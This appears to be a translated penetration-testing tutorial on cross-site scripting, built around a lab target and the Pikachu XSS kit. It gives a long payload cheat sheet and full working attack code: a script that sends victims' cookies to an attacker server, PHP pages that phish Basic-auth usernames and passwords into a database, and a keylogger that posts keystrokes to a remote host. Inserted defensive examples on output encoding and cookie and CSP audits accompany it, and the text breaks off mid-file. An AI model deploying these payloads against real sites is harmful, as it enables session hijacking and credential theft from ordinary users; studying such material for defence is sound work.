85. Network Security Penetration Testing - [Common Vulnerability Discovery and Exploitation, Part 1] - [XSS Vulnerability Discovery: Testing and Exploitation]

I believe that anyone who studies security or works in it has, to a greater or lesser degree, a sense of passion and mission!!!

Table of Contents

    • I. XSS Vulnerability Testing and Exploitation
      • 1. Related concepts
      • 2. XSS vulnerability types
      • 3. XSS vulnerability testing
      • 4. XSS exploitation principle: `stealing cookies`
      • 5. XSS exploitation example: `stealing cookies`
      • 6. XSS exploitation principle: `basic-authentication phishing`
      • 7. XSS exploitation example: `basic-authentication phishing`
      • 8. XSS exploitation principle: `keylogger`
      • 9. XSS exploitation example: `keylogger`
      • 10. Disabling the browser's XSS protection mechanism
      • 11. Reflections

I. XSS Vulnerability Testing and Exploitation

1. Related Concepts

(1) What XSS is: XSS stands for cross-site scripting. To avoid confusion with the abbreviation for Cascading Style Sheets (CSS), cross-site scripting is abbreviated XSS. It is a computer security vulnerability in web applications that lets a malicious web user plant code into a website where other users will access it; when a user visits a page carrying that malicious code, an XSS attack takes place.

(2) The essence of XSS: exploiting an XSS vulnerability means injecting a pair of script tags. Either the tag directly contains the malicious JS statements, or it references an external malicious JS file that holds the JS we wrote. That script can do many different things, such as basic-authentication phishing, capturing the user's cookie, obtaining intranet IP addresses, and so on!!!

(3) Harm caused by XSS:

    • Theft of all kinds of user accounts, such as machine login accounts, online banking accounts and administrator accounts of every sort
    • Control over corporate data, including the ability to read, tamper with, add and delete sensitive corporate data
    • Theft of important, commercially valuable corporate material
    • Illegal money transfers
    • Forcing the sending of e-mail
    • Planting malware on the website (drive-by download)
    • Controlling the victim's machine to launch attacks against other websites

2. XSS Vulnerability Types

(1) Reflected: reflected XSS is non-persistent; the user has to be tricked into clicking a link before the XSS code is triggered.

(2) Stored: stored XSS is persistent; the code is stored on the server. The code is inserted in places such as profile information, published articles or comments. If it is not filtered, or not filtered strictly enough, it is saved on the server and executes whenever a user visits that page.

(3) DOM-based: DOM stands for Document Object Model, a platform- and language-neutral interface that lets programs and scripts dynamically access and update the content, structure and style of a document.
         DOM-based XSS is really a special kind of reflected XSS: a vulnerability based on the DOM document object model.
         A web page contains many elements. When the page reaches the browser, the browser creates a top-level Document object for it and then generates the child document objects; each page element corresponds to a document object, and each document object has properties, methods and events. JS scripts can edit those document objects and thereby modify the page's elements. In other words, client-side script can dynamically modify page content through the DOM, fetching data from the DOM on the client and executing it locally. This characteristic is what lets JS be used to exploit an XSS vulnerability.
         Firefox cannot execute this kind of DOM XSS by default, because it encodes the string in the URL; IE does not encode it by default, but its XSS filter has to be turned off before the payload will execute.

The DOM properties involved:

    • the document.referrer property
    • the window.name property
    • the location property
    • the innerHTML property
    • the document.write method

3. XSS Vulnerability Testing

(1) The purpose of testing: to verify whether the current page executes the HTML tags or JS statements we inject, so that we can then inject malicious JS statements or pull in a malicious JS script file.

(2) Common test statements:

Reflected & stored & DOM (note: Firefox URL-encodes the DOM-based input, so use IE):

```html
<h5>1</h5>
<script>alert(/xss/)</script>
<SCRIPT>alert(document.cookie)</SCRIPT>
<img src=1 onerror=alert(document.cookie)>
```

Stored & DOM (note: Firefox URL-encodes the DOM-based input, so use IE):

```html
<script>var img=document.createElement("img");img.src="//192.168.97.130/exp/xss/a?"+escape(document.cookie);</script>
```

(3) Reflected test:

http://www.webtester.com/xss/xss01.php?name=1

http://www.webtester.com/xss/xss01.php?name=

http://www.webtester.com/xss/xss01.php?name=

(4) Stored test:

http://www.webtester.com/xss/xss02.php?name=

http://www.webtester.com/xss/xss02.php?name=

(5) DOM-based test:

http://www.webtester.com/xss/xss03.php?name=1

http://www.webtester.com/xss/xss03.php?name=

http://www.webtester.com/xss/xss03.php?name=

http://www.webtester.com/xss/xss03.php?name=

(6) Other test statements:

```html
<script>alert('hello,gaga!');</script>  // the classic one, haha!
>"'><img src="javascript.:alert('XSS')">
>"'><table background='javascript.:alert(([code])'>
<object type=text/html data='javascript.:alert(([code]);'>
"+alert('XSS')+"
'><script>alert(document.cookie)</script>
='>alert('XSS')<img src="javascript:alert('XSS')">
%0a%0a.jsp%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
a.jsp/"><IMG SRC="javascript.:alert('XSS');">
<IMG src="javascript.:alert('XSS')">
<IMG src="JaVaScRiPt.:alert('XSS')">
<IMG SRC="jav	ascript.:alert('XSS');">
<IMG SRC="jav
ascript.:alert('XSS');">
<IMG SRC="jav
ascript.:alert('XSS');">
"";'>out<IMG SRC=" javascript.:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript.:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript.:alert('XSS')">
<IMG LOWSRC="javascript.:alert('XSS')">
<BGSOUND SRC="javascript.:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript.:alert('XSS');">
<IMG SRC='vbscript.:msgbox("XSS")'>
<META. HTTP-EQUIV="refresh" CONTENT="0;url=javascript.:alert('XSS');">
<IFRAME. src="javascript.:alert('XSS')"></IFRAME>
<FRAMESET><FRAME. src="javascript.:alert('XSS')"></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript.:alert('XSS')">
<DIV STYLE="background-image: url(javascript.:alert('XSS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE. TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>
<BASE HREF="javascript.:alert('XSS');//">
getURL("javascript.:alert('XSS')")
a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
<XML SRC="javascript.:alert('XSS');">
"> <BODY NLOAD="a();"><"
<SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript.:alert('XSS')"
<SCRIPT. a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT. =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT. a=">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT. "a='>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
```
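As an added example that is not part of the original post: every probe in the lists above only reaches the browser as markup when the server echoes the `name` value into the page unchanged. The Python below models a PHP-style echo of the query parameter, runs a few of the post's own probe strings through a vulnerable renderer, a hardened one and a wrong-order one, and reports which probes survive. The page template and the probe selection are constructed for the demonstration.

```python
"""Context-aware output encoding versus the probe strings above.

Added example, not part of the original post.  TEMPLATE stands in for a
page such as xss01.php that echoes the `name` query parameter both into an
HTML text node and into an attribute value.
"""
import html
from urllib.parse import unquote

# Probe strings copied from the post's test lists (the dotted "javascript.:"
# form is kept exactly as the post shows it).
PROBES = [
    "<script>alert(/xss/)</script>",
    "<img src=1 onerror=alert(document.cookie)>",
    "\"'><img src=\"javascript.:alert('XSS')\">",
    "%3cscript%3ealert(%22xss%22)%3c/script%3e",
    "<BODY ONLOAD=alert('XSS')>",
]

# Constructed page template: the value lands in two different HTML contexts.
TEMPLATE = '<h5>Hello, {name}</h5>\n<input type="text" value="{name}">'


def render_vulnerable(raw_param: str) -> str:
    """Vulnerable page: the URL-decoded parameter is echoed verbatim."""
    return TEMPLATE.format(name=unquote(raw_param))


def render_hardened(raw_param: str) -> str:
    """Hardened page: decode once, then encode for the output context.

    html.escape(quote=True) rewrites < > & " and ' so the value can neither
    close the <h5> text node nor break out of the value="..." attribute.
    """
    return TEMPLATE.format(name=html.escape(unquote(raw_param), quote=True))


def render_wrong_order(raw_param: str) -> str:
    """Common mistake: encoding before the URL-decode happens.

    Anything still percent-encoded when html.escape runs is left untouched,
    and the later decode turns %3c back into a live '<'.
    """
    return TEMPLATE.format(name=unquote(html.escape(raw_param, quote=True)))


def probe_survives(rendered: str, raw_param: str) -> bool:
    """True when the decoded probe appears verbatim in the output, i.e. the
    browser would parse it as markup instead of text."""
    return unquote(raw_param) in rendered


def evaluate(render) -> dict:
    """Map each probe to whether it survives the given renderer."""
    return {probe: probe_survives(render(probe), probe) for probe in PROBES}


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("wrong order", render_wrong_order),
                          ("hardened", render_hardened)):
        hits = [p for p, survived in evaluate(render).items() if survived]
        print(f"{label:12s}: {len(hits)} of {len(PROBES)} probes reach the browser as markup")
```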

4. XSS Exploitation Principle: Stealing Cookies

(1) The attacker's malicious JS file: xss_attack.js

         Background: once the attacker has confirmed a stored XSS vulnerability in a comment field or on a message board, a single script statement can link in this xss_attack.js file hosted on the attacker's remote server, which then executes the statements below.
         Function: the script creates an img tag whose src pulls in the xss_receive.php script on the attacker's remote server, passing the cookie value obtained on the message board or comment page to the qwsn parameter as a GET request.

```javascript
var img = document.createElement('img');
img.width = 0;
img.height = 0;
// pass the cookie to the attacker's receiving page through the qwsn parameter
img.src = 'http://<attacker-remote-web-server>/xss_receive.php?qwsn=' + encodeURIComponent(document.cookie);
```

(2) The attacker's PHP file that receives the cookie: xss_receive.php

         Function: the attacker saves the qwsn parameter value received from the comment field or message board into the qwsn.php page on the attacker's remote server, thereby obtaining the cookie values of other people who visit the message board or comments.

```php
<?php
    @ini_set('display_errors', 1);
    $str = $_GET['qwsn'];       // read the cookie
    $filePath = "qwsn.php";     // save to qwsn.php
    $handler = fopen($filePath, "a");
    fwrite($handler, $str);
    fclose($handler);
?>
```

(3) Attacker side: the attacker posts the payload on the message board or in the comments. When a victim visits that page, the XSS vulnerability fires and the cookie value is passed through the qwsn parameter to the xss_receive.php page on the attacker's remote server, which saves it into qwsn.php in the same directory.

(4) Victim side: when the victim visits the message board or comment page, the XSS vulnerability fires immediately, i.e. the xss_attack.js file on the attacker's remote server is loaded as an external script. That file passes the current user's cookie through the qwsn parameter to xss_receive.php on the attacker's remote server, which in turn saves the cookie value into the attacker's qwsn.php page.
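An added example, not from the original post: the chain in (3) and (4) depends on two things the victim site controls. `document.cookie` cannot read a cookie set with `HttpOnly`, and a Content-Security-Policy that restricts `script-src` and `img-src` to the site's own origin blocks both the external xss_attack.js load and the img.src beacon to xss_receive.php. The Python below audits a response's `Set-Cookie` and CSP headers for exactly those properties; the header values are constructed samples.

```python
"""Audit the response headers that decide whether the cookie-theft chain works.

Added example, not part of the original post.  A cookie flagged HttpOnly is
not returned by document.cookie, so xss_attack.js has nothing to exfiltrate;
a CSP whose script-src / img-src is limited to 'self' blocks both the
<script src=...> load from the attacker host and the img.src beacon.
"""


def parse_set_cookie(value: str) -> dict:
    """Split 'PHPSESSID=x; Path=/; HttpOnly' into the cookie name and a
    case-insensitive attribute map (RFC 6265 attribute names)."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name, _, _ = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return {"name": name.strip(), "attrs": attrs}


def audit_cookie(value: str) -> list:
    """Findings for one Set-Cookie header."""
    cookie = parse_set_cookie(value)
    attrs, name = cookie["attrs"], cookie["name"]
    findings = []
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly, readable via document.cookie")
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite is not Lax or Strict")
    return findings


def parse_csp(value: str) -> dict:
    """'default-src 'self'; img-src 'self' data:' -> {directive: [sources]}."""
    directives = {}
    for directive in value.split(";"):
        tokens = directive.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def effective_sources(csp: dict, directive: str):
    """Fetch directives fall back to default-src; None means unrestricted."""
    return csp.get(directive, csp.get("default-src"))


def allows_any_origin(csp: dict, directive: str) -> bool:
    """True if the directive lets the browser fetch from an arbitrary host."""
    sources = effective_sources(csp, directive)
    if sources is None:
        return True
    return any(src in ("*", "http:", "https:") for src in sources)


def allows_inline_script(csp: dict) -> bool:
    """True if an inline <script>...</script> payload would run."""
    sources = effective_sources(csp, "script-src")
    return sources is None or "'unsafe-inline'" in sources


def audit_response(headers: list) -> list:
    """headers: list of (name, value) pairs as sent by the server."""
    findings, csp = [], None
    for name, value in headers:
        lname = name.lower()
        if lname == "set-cookie":
            findings.extend(audit_cookie(value))
        elif lname == "content-security-policy":
            csp = parse_csp(value)
    if csp is None:
        findings.append("no Content-Security-Policy header")
    else:
        if allows_inline_script(csp):
            findings.append("CSP: inline <script> payloads are allowed")
        for directive in ("script-src", "img-src"):
            if allows_any_origin(csp, directive):
                findings.append(f"CSP: {directive} allows fetches from any origin")
    return findings


# Constructed sample responses: a session cookie as a plain PHP app sets it,
# and the same response after hardening.
WEAK_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "PHPSESSID=0123456789abcdef; Path=/"),
]
HARDENED_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "PHPSESSID=0123456789abcdef; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Content-Security-Policy", "default-src 'self'; script-src 'self'; img-src 'self' data:"),
]

if __name__ == "__main__":
    for label, headers in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_response(headers) or ["no findings"])
```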

5. XSS Exploitation Example: Stealing Cookies

(1) Target: http://www.webtester.com/xss/xss02.php

(2) Attacker's web server:

    • Attacker IP: 192.168.97.130 (the domain name mapped to this IP is www.exploit.com)
    • Attacker's web service directory: 192.168.97.130/exp/xss
    • Location of the attacker's malicious JS script: 192.168.97.130/exp/xss/xss_attack.js
    • Location of the attacker's cookie-receiving PHP file: 192.168.97.130/exp/xss/xss_receive.php
    • Location of the attacker's cookie storage file: 192.168.97.130/exp/xss/qwsn.php

(3) The malicious script file xss_attack.js reads the cookie and passes it to the xss_receive.php page through the qwsn parameter

Contents of xss_attack.js:

```javascript
var img = document.createElement('img');   // the image is never inserted into the page
img.width = 0;
img.height = 0;
// assigning src is enough to make the browser request the URL, so the cookie travels in the qwsn parameter
img.src = 'http://192.168.97.130/exp/xss/xss_receive.php?qwsn=' + encodeURIComponent(document.cookie);
```

(4) xss_receive.php reads the cookie value carried in the qwsn parameter and appends it to the file qwsn.php in the current directory.

Contents of xss_receive.php:

```php
<?php
    @ini_set('display_errors', 1);
    $str = $_GET['qwsn'];      // read the cookie value sent by xss_attack.js
    $filePath = "qwsn.php";    // save it to qwsn.php
    $handler = fopen($filePath, "a");
    fwrite($handler, $str);
    fclose($handler);
?>
```

(5) The attacker's payloads:

payload-1 (works): `<script src="http://192.168.97.130/exp/xss/xss_attack.js"></script>`
payload-2 (works, protocol-relative URL): `<script src="//192.168.97.130/exp/xss/xss_attack.js"></script>`

(6) Exploitation process:

Step 1: Acting as the attacker, post payload-1 or payload-2 to the guestbook. When anyone else visits the page, the XSS vulnerability fires: the cookie value is passed through the qwsn parameter to our xss_receive.php page and saved into qwsn.php.

```html
<script src="http://192.168.97.130/exp/xss/xss_attack.js"></script>
```


Step 2: Acting as the victim, visit the guestbook page. The XSS vulnerability triggers immediately, i.e. the attacker's xss_attack.js is loaded; it passes the current user's cookie through the qwsn parameter to xss_receive.php on the attacker's remote server, which in turn saves that cookie value into the attacker's qwsn.php file.

Step 3: The attacker reads the cookies saved in qwsn.php.

Finally: besides payload-1, payload-2 above achieves exactly the same effect!!!
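From the defender's side, the chain above breaks at two points: output encoding stops the injected tag from ever being parsed as a script, and the HttpOnly cookie attribute hides the session cookie from document.cookie. The following is an added example, not code from the original post; PAYLOAD_1 and PAYLOAD_2 are the post's own payloads, while renderComment and the Set-Cookie headers are constructed assumptions.

```javascript
// Added example (not from the original post): two defensive layers against the
// cookie-theft chain above. PAYLOAD_1/PAYLOAD_2 are the post's payloads; the
// Set-Cookie headers below are constructed sample values.

// Layer 1: encode user content at output time. The injected <script src="...">
// is then displayed as literal text and the browser never fetches xss_attack.js.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// Hypothetical guestbook renderer: every user-controlled field goes through escapeHtml.
function renderComment(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Layer 2: a cookie carrying the HttpOnly attribute is invisible to document.cookie,
// so even a successful injection exfiltrates nothing useful. This audit parses
// Set-Cookie headers and returns the names of the cookies script could still read.
function cookiesReadableByScript(setCookieHeaders) {
  const exposed = [];
  for (const header of setCookieHeaders) {
    const parts = header.split(';').map((p) => p.trim());
    const name = parts[0].split('=')[0];
    const attrs = parts.slice(1).map((a) => a.toLowerCase());
    if (!attrs.includes('httponly')) exposed.push(name);
  }
  return exposed;
}

const PAYLOAD_1 = '<script src="http://192.168.97.130/exp/xss/xss_attack.js"></script>';
const PAYLOAD_2 = '<script src="//192.168.97.130/exp/xss/xss_attack.js"></script>';

// Constructed sample: only PHPSESSID is protected; the other two would reach xss_receive.php.
const SAMPLE_SET_COOKIE = [
  'PHPSESSID=abc123; Path=/; HttpOnly; SameSite=Lax',
  'username=alice; Path=/',
  'theme=dark; Path=/; Secure',
];

function demo() {
  return {
    rendered1: renderComment('guest', PAYLOAD_1),
    rendered2: renderComment('guest', PAYLOAD_2),
    exposed: cookiesReadableByScript(SAMPLE_SET_COOKIE),
  };
}

console.log(demo());
```

Note that HttpOnly protects only what script can read; it does not stop the injected script from acting on the user's behalf with requests the browser attaches the cookie to.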

6. XSS exploitation principle: basic-authentication phishing

(1) The malicious phishing script on the attacker's remote web server, fish.php

         Background: when a guestbook or comment page has a stored XSS vulnerability, the attacker can store a payload in that page's server-side database so that it fires whenever a victim visits the page. Here the payload's job is to load, as an external resource, the basic-authentication-prompt script fish.php hosted on the attacker's remote server.

         Function: pops up a basic authentication dialog

```php
<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
    // send the authentication challenge, with a misleading message
    header('Content-type:text/html;charset=utf-8');
    header("WWW-Authenticate: Basic realm='認證'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))) {
    // send the result to the collecting backend; change this IP to the admin backend's IP
    header("Location: http://攻擊者的遠程WEB服務器/xfish.php?username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}");
}
?>
```

(2) The file on the attacker's remote web server that saves the authentication result, xfish.php

         Function: saves the username and password the victim entered into the basic authentication dialog into the database on the attacker's remote server

```php
<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();
if(!empty($_GET['username']) && !empty($_GET['password'])){
    $username=$_GET['username'];
    $password=$_GET['password'];
    $referer="";
    $referer.=$_SERVER['HTTP_REFERER'];
    $time=date('Y-m-d g:i:s');
    $query="insert fish(time,username,password,referer) values('$time','$username','$password','$referer')";
    $result=mysqli_query($link, $query);
}
?>
```

(3) The file on the attacker's remote web server that displays the saved authentication results, pkxss_fish_result.php

```php
<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();
// check login; the page is not accessible unless logged in
if(!check_login($link)){
    header("location:../pkxss_login.php");
}
if(isset($_GET['id']) && is_numeric($_GET['id'])){
    $id=escape($link, $_GET['id']);
    $query="delete from fish where id=$id";
    execute($link, $query);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>釣魚結果</title>
<link rel="stylesheet" type="text/css" href="../antxss.css" />
</head>
<body>
<div id="title">
<h1>pikachu Xss 釣魚結果</h1>
<a href="../xssmanager.php">返回首頁</a>
</div>
<div id="result">
    <table class="tb" border="1px" cellpadding="10" cellspacing="1" bgcolor="#5f9ea0">
        <tr>
            <td class="1">id</td>
            <td class="1">time</td>
            <td class="1">username</td>
            <td class="1">password</td>
            <td class="2">referer</td>
            <td class="2">操作</td>
        </tr>
    <?php
    $query="select * from fish";
    $result=mysqli_query($link, $query);
    while($data=mysqli_fetch_assoc($result)){
$html=<<<A
        <tr>
            <td>{$data['id']}</td>
            <td>{$data['time']}</td>
            <td>{$data['username']}</td>
            <td>{$data['password']}</td>
            <td>{$data['referer']}</td>
            <td><a href="pkxss_fish_result.php?id={$data['id']}">刪除</a></td>
        </tr>
A;
        echo $html;
    }
    ?>
    </table>
</div>
</body>
</html>
```

(3) Attacker side

         The attacker posts the payload to a message board or comment area. When the victim visits that page the XSS fires and a Basic authentication prompt pops up. Once the user enters a username and password, they are passed via the username and password parameters to the xfish.php page on the attacker's remote server, whose job is to save the received parameters into the attacker's database. Finally the attacker reads the captured authentication results through the pkxss_fish_result.php page on his own server.

(4) Victim side

         The victim visits the message board or comment page, which immediately triggers the XSS: the externally linked fish.php script on the attacker's remote server is loaded. That file forwards the username and password the victim types into the authentication prompt to the xfish.php page on the attacker's remote server, which stores those values in the attacker's database for the attacker to view.

7. XSS exploitation example: Basic authentication phishing

(1) Target: http://www.webtester.com/xss/xss02.php

(2) Attacker web server:

Attacker IP: www.exploit.cool (the domain resolves to 192.168.97.130)
Attacker web directory: http://www.exploit.cool/exp/pikachu/pkxss/xfish/
Malicious PHP script that serves the Basic authentication prompt: http://www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php
PHP file that receives the authentication result: http://www.exploit.cool/exp/pikachu/pkxss/xfish/xfish.php
PHP file that reads the authentication results: http://www.exploit.cool/exp/pikachu/pkxss/xfish/pkxss_fish_result.php

(3) fish.php serves the Basic authentication prompt

```php
<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
    // Send the authentication prompt, with a misleading realm
    header('Content-type:text/html;charset=utf-8');
    header("WWW-Authenticate: Basic realm='認證'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))) {
    // Forward the result to the collecting back end; change this address to the back end's IP
    //echo $_SERVER['PHP_AUTH_USER'];
    //echo $_SERVER['PHP_AUTH_PW'];
    header("Location: http://www.exploit.cool/exp/pikachu/pkxss/xfish/xfish.php?username={$_SERVER['PHP_AUTH_USER']}&password={$_SERVER['PHP_AUTH_PW']}");
}
?>
```

(4) xfish.php reads and saves the authentication result

```php
<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();
if(!empty($_GET['username']) && !empty($_GET['password'])){
    $username=$_GET['username'];
    $password=$_GET['password'];
    $referer="";
    $referer.=$_SERVER['HTTP_REFERER'];
    $time=date('Y-m-d g:i:s');
    $query="insert fish(time,username,password,referer) values('$time','$username','$password','$referer')";
    $result=mysqli_query($link, $query);
}
?>
```

(5) Attacker's payloads

payload-1 (works): `<script src="http://www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php"></script>`

payload-2 (works): `<script src="//www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php"></script>`

payload-3 (untested): `<img src="http://www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php" />`
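All three payloads depend on the message board echoing the stored comment into the page without encoding. As an added example (not code from the original post or from the Pikachu lab), here is the HTML-context encoding the board would need, checked against those same payloads; the comment objects are constructed sample data.

```javascript
// Added example, not code from the original post or from the Pikachu lab:
// the output encoding the message board is missing, checked against the
// three payloads listed above. Node.js, no dependencies.

// Encode the characters that can end a text node or a quoted attribute
// value. Apply at render time, for the HTML context only (URL and JS
// contexts need their own encoders).
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The vulnerable pattern: untrusted fields interpolated straight into markup,
// which is what lets a <script src=...> comment reach the browser as a tag.
function renderCommentUnsafe(comment) {
  return `<tr><td>${comment.user}</td><td>${comment.body}</td></tr>`;
}

// The hardened form: every untrusted field goes through escapeHtml().
function renderComment(comment) {
  return `<tr><td>${escapeHtml(comment.user)}</td>` +
         `<td>${escapeHtml(comment.body)}</td></tr>`;
}

function renderBoard(comments, render = renderComment) {
  return comments.map(render).join("\n");
}

// Review check over rendered output: does a tag that can load a remote
// resource, or an inline event handler, survive where only text belonged?
function containsActiveMarkup(html) {
  return /<\s*(script|img|iframe|svg|object|embed)\b/i.test(html) ||
         /\son[a-z]+\s*=/i.test(html);
}

// Constructed sample comments: one benign, three carrying the post's payloads.
const SAMPLE_COMMENTS = [
  { user: "alice", body: "hello" },
  { user: "mallory", body: '<script src="http://www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php"></script>' },
  { user: "mallory", body: '<script src="//www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php"></script>' },
  { user: "mallory", body: '<img src="http://www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php" />' },
];

// renderBoard(SAMPLE_COMMENTS) yields rows in which every payload is inert text;
// renderBoard(SAMPLE_COMMENTS, renderCommentUnsafe) reproduces the vulnerable page.
```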

(6) Exploitation steps

Step 1: acting as the attacker, post the payload to the message board; when the victim visits the page, the XSS fires.

Step 2: acting as the victim, visit the message board page.

Step 3: acting as the attacker, read the authentication result through the pkxss_fish_result.php page on the attacker's own web server.

Alternatively, the attacker checks the captured account data directly in the database.


(7) Note: PHP's HTTP authentication mechanism only works when PHP runs as an Apache module, so this feature is not available in the CGI version (nor in phpstudy's NTS mode). In a PHP script running as an Apache module, the header() function can send an "Authentication Required" message to the client browser, which makes it pop up a username/password dialog. Once the user has entered a username and password, the PHP script at that URL is called again with the predefined variables PHP_AUTH_USER, PHP_AUTH_PW and AUTH_TYPE set to the username, the password and the authentication type respectively. These predefined variables are stored in the $_SERVER or $HTTP_SERVER_VARS arrays. Only "Basic" authentication is supported.

8. XSS exploitation principle: keylogger

(1) Cross-origin requests and the same-origin policy

(2) What counts as the same origin?

         Answer: two page addresses are same-origin when their protocol, domain/IP address and port number are all identical (the so-called five-tuple).

(3) Why have a same-origin policy?

         Answer: the main purpose of the same-origin policy is security. Without it, cookies and other data in the browser could be read at will, the DOM of a different domain could be manipulated freely, and ajax could request data from any other site, including private data.

(4) The malicious rk.js script that records keystrokes

Function: the script records the victim's keystrokes and sends them to the rkserver.php page on the attacker's remote server, which in turn stores the data in the attacker's database.

```javascript
/**
 * Created by runner on 2018/7/8.
 */
// Build an XMLHttpRequest, falling back to the ActiveX objects of old IE
function createAjax(){
    var request=false;
    if(window.XMLHttpRequest){
        request=new XMLHttpRequest();
        if(request.overrideMimeType){
            request.overrideMimeType("text/xml");
        }
    }else if(window.ActiveXObject){
        var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
        for(var i=0; i<versions.length; i++){
            try{
                request=new ActiveXObject(versions[i]);
                if(request){
                    return request;
                }
            }catch(e){
                request=false;
            }
        }
    }
    return request;
}
var ajax=null;
var xl="datax=";
// Append each key pressed on the page to the buffer and send it off
function onkeypress() {
    var realkey = String.fromCharCode(event.keyCode);
    xl+=realkey;
    show();
}
document.onkeypress = onkeypress;
// POST the buffer to rkserver.php on the attacker's web server
function show() {
    ajax = createAjax();
    ajax.onreadystatechange = function () {
        if (ajax.readyState == 4) {
            if (ajax.status == 200) {
                var data = ajax.responseText;
            } else {
                alert("頁面請求失敗");
            }
        }
    }
    var postdate = xl;
    ajax.open("POST", "http://攻擊者WEB服務器/rkserver.php",true);
    ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    ajax.setRequestHeader("Content-length", postdate.length);
    ajax.setRequestHeader("Connection", "close");
    ajax.send(postdate);
}
```

(5) rkserver.php, which receives the keystroke data sent by the malicious rk.js script

```php
<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();
// Allow the page to be accessed cross-origin
header("Access-Control-Allow-Origin:*");
$data = $_POST['datax'];
$query = "insert keypress(data) values('$data')";
$result=mysqli_query($link,$query);
?>
```

(6) pkxss_keypress_result.php, the page on which the attacker reads the victim's keystrokes

<?php
// error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link = connect();
// Require a pikachu login; unauthenticated visitors are redirected.
// exit() added here: without it the Location header is sent but the
// rest of the page is still rendered to the unauthenticated client.
if (!check_login($link)) {
    header("location:../pkxss_login.php");
    exit();
}
// Delete one record; the id is checked with is_numeric and escaped.
if (isset($_GET['id']) && is_numeric($_GET['id'])) {
    $id = escape($link, $_GET['id']);
    $query = "delete from keypress where id=$id";
